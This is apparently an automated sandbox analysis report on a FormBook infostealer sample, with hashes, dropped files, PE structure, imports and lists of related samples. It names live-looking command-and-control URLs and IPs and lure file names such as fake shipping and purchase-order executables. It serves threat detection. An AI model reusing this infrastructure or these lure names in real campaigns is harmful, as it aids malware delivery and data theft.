                                                                                                                                  DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.030002787.xyz/jd21/?4h=5kdLJS6M41di2+SNW7K1XcXipX6NQkkN8kSgJbF3gr0dFVoGwgZsF4aW2rsxuxwIowbH&pPQ=OJEtxf4
                                                                                                                                  jeez.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.030002803.xyz/bw0u/
                                                                                                                                  quote894590895pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.030002832.xyz/k59q/
                                                                                                                                  AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.030002252.xyz/2ncs/
                                                                                                                                  NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.030002304.xyz/6uay/
                                                                                                                                  8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.030002304.xyz/f06i/
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.030002837.xyz/y045/

                                                                                                                                  Domains

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  webredir.vip.gandi.netrDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  CENA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  fJD7ivEnzm.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 217.70.184.50
                                                                                                                                  www.rudemyvague.infoBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 52.13.151.179
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 52.13.151.179
                                                                                                                                  www.launchdreamidea.xyzBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  CENA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  www.drevohome.shopBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 94.23.162.163
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 54.38.220.85
                                                                                                                                  longg002.cnBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 8.210.49.139
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 8.210.49.139
                                                                                                                                  www.itemsort.shopBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.96.3
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 188.114.97.3

                                                                                                                                  ASNs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  CP-ASDETT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  https://eadzhost.net/quieter/QUOTE_TECNO_GAZ_INDUSTRIES_63787_MC.rarGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.29.43
                                                                                                                                  na.htaGet hashmaliciousCobalt Strike, FormBook, GuLoaderBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  jeez.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  quote894590895pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 65.21.196.90
                                                                                                                                  MULTIBAND-NEWHOPEUSBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.64.187
                                                                                                                                  Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                  • 209.74.64.189
                                                                                                                                  Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.64.190
                                                                                                                                  #U8a02#U55ae#U63cf#U8ff0.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.64.190
                                                                                                                                  rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.64.187
                                                                                                                                  r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.64.190
                                                                                                                                  Tandemmernes90.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  • 209.74.64.189
                                                                                                                                  PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.64.190
                                                                                                                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 209.74.95.29
                                                                                                                                  Aunali_khokhawala-In Services.Agreement-SDYAMPA 416944.rtfGet hashmaliciousEvilProxy, Fake Captcha, HTMLPhisherBrowse
                                                                                                                                  • 209.74.66.146
                                                                                                                                  CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCPO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                  • 8.210.3.99
                                                                                                                                  BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 8.210.49.139
                                                                                                                                  index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                  • 47.254.175.252
                                                                                                                                  index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                  • 47.254.175.252
                                                                                                                                  PDWsetup.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                  • 8.217.62.104
                                                                                                                                  request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                  • 8.223.114.243
                                                                                                                                  SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 47.241.41.42
                                                                                                                                  SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 47.241.41.42
                                                                                                                                  yakuza.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 47.57.30.200
                                                                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 47.245.134.47
                                                                                                                                  VOYAGERNET-AS-APVoyagerInternetLtdNZBL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 103.106.67.112
                                                                                                                                  arm.nn-20241014-0317.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                  • 114.23.169.157
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 103.106.67.112
                                                                                                                                  Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 103.106.67.112
                                                                                                                                  0wG3Y7nLHa.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                  • 111.65.234.232
                                                                                                                                  i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 202.154.140.243
                                                                                                                                  xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 203.96.31.242
                                                                                                                                  KKveTTgaAAsecNNaaaa.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 103.146.201.21
                                                                                                                                  kz7iLmqRuq.exeGet hashmaliciousQuasarBrowse
                                                                                                                                  • 203.96.177.211
                                                                                                                                  https://app.realcreator.co/preview/9fe9f3e5-8e52-4155-934b-225a56159ee0Get hashmaliciousUnknownBrowse
                                                                                                                                  • 103.146.241.97

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  No context

                                                                                                                                  Dropped Files

                                                                                                                                  No context

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\Users\user\AppData\Local\Temp\6222f67M

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):196608
                                                                                                                                  Entropy (8bit):1.121297215059106
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\outvaunts

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\Doc 784-01965670.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):286208
                                                                                                                                  Entropy (8bit):7.993538876716945
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:6144:9X832UkLA2nHI8y6UBj3bUfEzcA0eVsFKxcoLqF6YTXzkdA:9EhkLNIOALUCxmomoOFdTIdA
                                                                                                                                  MD5:9203C945B4CC19F67F45A6D12967F070
                                                                                                                                  SHA1:D87D718E78EE27228F8AE8E9F41AB7BE5A80036E
                                                                                                                                  SHA-256:38AF42D36BA0BE376F0A616B5AC6AE49A77B94F8D110727AF6C171DB2A0D9B93
                                                                                                                                  SHA-512:68A416142108E71EF64C21B3429FA847F479632781832D777C32768A254D30B89F02D520E378A42C54D7995E5392A168D6C9731EFCCE9C23071F97CA170ECBE3
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:.m...C2RX...Z.....R[...{4@...2RXH9BS7HPVC2RXH9BS7HPVC2RXH9B.7HPX\.\X.0.r.I..bf:1;.2!X/"7..19&W-'.*5v1G<x!Wb.x.p;,V7vE4Hw7HPVC2R!I0.nW/.k#U.e(^.I..l#U.B.oW/.L.d(^..^+8k#U.XH9BS7HP..2R.I8B4..2VC2RXH9B.7JQ]B9RX.=BS7HPVC2R.[9BS'HPV#6RXHyBS'HPVA2R^H9BS7HPPC2RXH9BSWLPVA2RXH9BQ7..VC"RXX9BS7XPVS2RXH9BC7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9B}C-("C2R..=BS'HPV.6RXX9BS7HPVC2RXH9Bs7H0VC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HPVC2RXH9BS7HP

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):7.50834362014965
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                                                                  • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:Doc 784-01965670.exe
                                                                                                                                  File size:1'321'247 bytes
                                                                                                                                  MD5:f9d3e00cde42773f49276bfd202813f5
                                                                                                                                  SHA1:79e43e7b0d15c4ed5f8fdd1d1e89edf58d5ec1ac
                                                                                                                                  SHA256:0192d385d59bc9e853e7b58a9e3cf65857b7be49c3ba92185bfd7241a36ccc0d
                                                                                                                                  SHA512:99450a24bd67d69d2a65a0366c5b501430569ace4b11422b8b06cb27248e4692873b64d9ea545260e739b8c65073d28b168794647650061b4623368e2e1522bf
                                                                                                                                  SSDEEP:24576:ffmMv6Ckr7Mny5QLufE2AZ71OteoDBB44oMEp1oUeot:f3v+7/5QLufElMX4BMEroUe+
                                                                                                                                  TLSH:4D55F112B7D680F6E9A33971297BE32BDB3575194337C4C7A7E02E768E211409B36362
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:1733312925935517

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x416310
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:5
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:5
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:5
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  call 00007F8EA057DA2Ch
                                                                                                                                  jmp 00007F8EA05717FEh
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  push edi
                                                                                                                                  push esi
                                                                                                                                  mov esi, dword ptr [ebp+0Ch]
                                                                                                                                  mov ecx, dword ptr [ebp+10h]
                                                                                                                                  mov edi, dword ptr [ebp+08h]
                                                                                                                                  mov eax, ecx
                                                                                                                                  mov edx, ecx
                                                                                                                                  add eax, esi
                                                                                                                                  cmp edi, esi
                                                                                                                                  jbe 00007F8EA057198Ah
                                                                                                                                  cmp edi, eax
                                                                                                                                  jc 00007F8EA0571B2Ah
                                                                                                                                  cmp ecx, 00000100h
                                                                                                                                  jc 00007F8EA05719A1h
                                                                                                                                  cmp dword ptr [004A94E0h], 00000000h
                                                                                                                                  je 00007F8EA0571998h
                                                                                                                                  push edi
                                                                                                                                  push esi
                                                                                                                                  and edi, 0Fh
                                                                                                                                  and esi, 0Fh
                                                                                                                                  cmp edi, esi
                                                                                                                                  pop esi
                                                                                                                                  pop edi
                                                                                                                                  jne 00007F8EA057198Ah
                                                                                                                                  pop esi
                                                                                                                                  pop edi
                                                                                                                                  pop ebp
                                                                                                                                  jmp 00007F8EA0571DEAh
                                                                                                                                  test edi, 00000003h
                                                                                                                                  jne 00007F8EA0571997h
                                                                                                                                  shr ecx, 02h
                                                                                                                                  and edx, 03h
                                                                                                                                  cmp ecx, 08h
                                                                                                                                  jc 00007F8EA05719ACh
                                                                                                                                  rep movsd
                                                                                                                                  jmp dword ptr [00416494h+edx*4]
                                                                                                                                  nop
                                                                                                                                  mov eax, edi
                                                                                                                                  mov edx, 00000003h
                                                                                                                                  sub ecx, 04h
                                                                                                                                  jc 00007F8EA057198Eh
                                                                                                                                  and eax, 03h
                                                                                                                                  add ecx, eax
                                                                                                                                  jmp dword ptr [004163A8h+eax*4]
                                                                                                                                  jmp dword ptr [004164A4h+ecx*4]
                                                                                                                                  nop
                                                                                                                                  jmp dword ptr [00416428h+ecx*4]
                                                                                                                                  nop
                                                                                                                                  mov eax, E4004163h
                                                                                                                                  arpl word ptr [ecx+00h], ax
                                                                                                                                  or byte ptr [ecx+eax*2+00h], ah
                                                                                                                                  and edx, ecx
                                                                                                                                  mov al, byte ptr [esi]
                                                                                                                                  mov byte ptr [edi], al
                                                                                                                                  mov al, byte ptr [esi+01h]
                                                                                                                                  mov byte ptr [edi+01h], al
                                                                                                                                  mov al, byte ptr [esi+02h]
                                                                                                                                  shr ecx, 02h
                                                                                                                                  mov byte ptr [edi+02h], al
                                                                                                                                  add esi, 03h
                                                                                                                                  add edi, 03h
                                                                                                                                  cmp ecx, 08h
                                                                                                                                  jc 00007F8EA057194Eh

                                                                                                                                  Rich Headers

                                                                                                                                  Programming Language:
                                                                                                                                  • [ASM] VS2008 SP1 build 30729
                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                  • [C++] VS2008 SP1 build 30729
                                                                                                                                  • [ C ] VS2005 build 50727
                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                  • [ASM] VS2008 build 21022
                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                  • [LNK] VS2008 SP1 build 30729

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                  RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                  RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                  RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                  RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                                  RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                                  RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                                  RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                                  RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                                  RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                                  RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                                  RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                                  RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                                  RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                                  RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                                  RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                                  RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                                  RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                                                                                  RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                  RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                  RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                                                                                  RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                                  RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                                  RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                                                                                  RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                                                                                  RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                                                                                  RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                                  RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                  VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                  COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                  MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                  PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                  USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                  KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, 